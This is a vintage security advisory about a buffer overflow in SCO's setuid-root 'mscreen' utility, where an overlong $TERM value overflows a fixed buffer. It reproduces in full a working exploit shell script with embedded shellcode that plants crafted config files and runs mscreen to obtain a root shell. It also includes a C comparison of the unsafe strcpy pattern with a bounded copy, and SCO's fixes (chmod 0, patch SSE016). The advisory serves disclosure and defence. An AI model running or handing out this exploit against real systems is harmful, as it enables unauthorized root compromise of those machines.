COMMAND

    mscreen

SYSTEMS AFFECTED

    SCO Open Desktop/Open Server 3.0 (all, also SCO UNIX 3.2v4)
    SCO OpenServer 5.0 (all, also SCO Internet FastStart)
    SCO CMW+ 3.0

PROBLEM

    'bst' found the following.  SCO's suid-root "mscreen" (serial
    multiscreens utility) has a buffer overflow: the value of $TERM is
    copied into a fixed-size buffer.  It is confirmed on 5.0.4 at least.
    Leshka made an exploit.

    #!/bin/sh
    #
    #                                   Hi !
    #             This is a buffer overflow exploit for mscreen bug
    #                (SCO OpenServer Enterprise System v 5.0.4p).
    #              This script runs a shell with root permissions.
    #            If you have any problems with it, drop me a letter.
    #                                Have fun !
    #
    #
    #                           ----------------------
    #               ---------------------------------------------
    #    -----------------   Dedicated to my beautiful lady   ------------------
    #               ---------------------------------------------
    #                           ----------------------
    #
    #          Leshka Zakharoff, 1998. E-mail: leshka@leshka.chuvashia.su
    #
    #
    #
    echo '***4.999,99***('\
    '\0220\0353*]U\0376M\0347\0376M\0353\0376M\0354\0376M\0355\0377E\0357\0376M'\
    '\0364\0303/bin/sh\01\0215\05;\01\01\01\0232\0377\0377\0377\0377\07\01\0307'\
    '\0304"\0365\04\010\0350\0313\0377\0377\0377\0201\0305\0357\0377\0377\0377U'\
    'U\0201\0305\0361\0377\0377\0377U\0350\0324\0377\0377\0377)'>$HOME/.mscreenrc
    echo 'leshka:*leshka**leshka**leshka*#\0365\04\010:'>$HOME/mscreencap
    MSCREENCAP=$HOME/mscreencap TERM=leshka; export MSCREENCAP TERM
    echo "Type any command than press <ENTER> and <CTRL>-D"
    cat|/usr/bin/mscreen;rm $HOME/.mscreenrc $HOME/mscreencap
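    The copy pattern behind this class of bug, beside a bounded version that
    refuses an overlong value instead of writing past the buffer, as an added
    example that is not part of the advisory or of SCO's source.  The buffer
    size TERMBUF and the function names are assumptions; the advisory does
    not give mscreen's real buffer size.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed fixed buffer size for illustration; mscreen's real size is not on the page. */
#define TERMBUF 32

/* Pattern the advisory describes: $TERM is copied into a fixed-size stack
 * buffer with no length check, so a value longer than the buffer overwrites
 * whatever follows it.  In a setuid-root binary that is a root compromise.
 * Kept here only for comparison; never called. */
void copy_term_unsafe(const char *term)
{
    char buf[TERMBUF];
    strcpy(buf, term);   /* unbounded copy: overflows buf for long values of term */
    (void)buf;
}

/* Hardened version: scan at most outlen bytes and reject a value that does
 * not fit with its NUL terminator.  Rejecting beats silent truncation, since
 * a truncated terminal name is itself wrong.  Returns 1 on success, 0 if the
 * value is missing or too long. */
int copy_term_checked(const char *term, char *out, size_t outlen)
{
    size_t n = 0;
    if (term == NULL || outlen == 0)
        return 0;
    while (n < outlen && term[n] != '\0')   /* bounded scan, no strlen on untrusted input */
        n++;
    if (n == outlen)                        /* no room for the terminator */
        return 0;
    memcpy(out, term, n + 1);
    return 1;
}

/* Helper mirroring what a setuid program should do with $TERM: copy into a
 * TERMBUF-sized buffer only if it fits.  Returns the result of the check. */
int accepts_term(const char *term)
{
    char buf[TERMBUF];
    return copy_term_checked(term, buf, sizeof buf);
}

int main(void)
{
    if (accepts_term(getenv("TERM")))
        printf("TERM accepted\n");
    else
        fprintf(stderr, "TERM missing or longer than %d bytes: refusing\n", TERMBUF - 1);
    return 0;
}
```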

SOLUTION

    For SCO CMW+,  the mscreen utility  is non-functional; however,  a
    binary is installed on the system with the set-user-id  attribute.
    This should be disabled by executing the following command  logged
    in as root:

        # chmod 0 /usr/bin/mscreen

    For SCO OpenServer  5 and SCO  Open Desktop/Open Server  3, SCO is
    providing an interim patch to address this issue in the form of  a
    System Security  Enhancement (SSE)  package.   SSE016 contains new
    versions  of  the  mscreen  binary  for  each  system type.  It is
    available for Internet  download via anonymous  ftp, and from  the
    SCOFORUM  on  Compuserve.   You  can  download  the SSE package as
    follows:

        ftp://ftp.sco.COM/SSE/sse016.ltr    (cover letter, ASCII text)
        ftp://ftp.sco.COM/SSE/sse016.tar.Z  (new binaries, compressed tar file)

      Compuserve:
        GO SCOFORUM, and search  Library 11 (SLS/SSE Files)  for these
        filenames:
        SSE016.LTR      (cover letter, ASCII text)
        SSE016.TAZ      (new binaries, compressed tar file)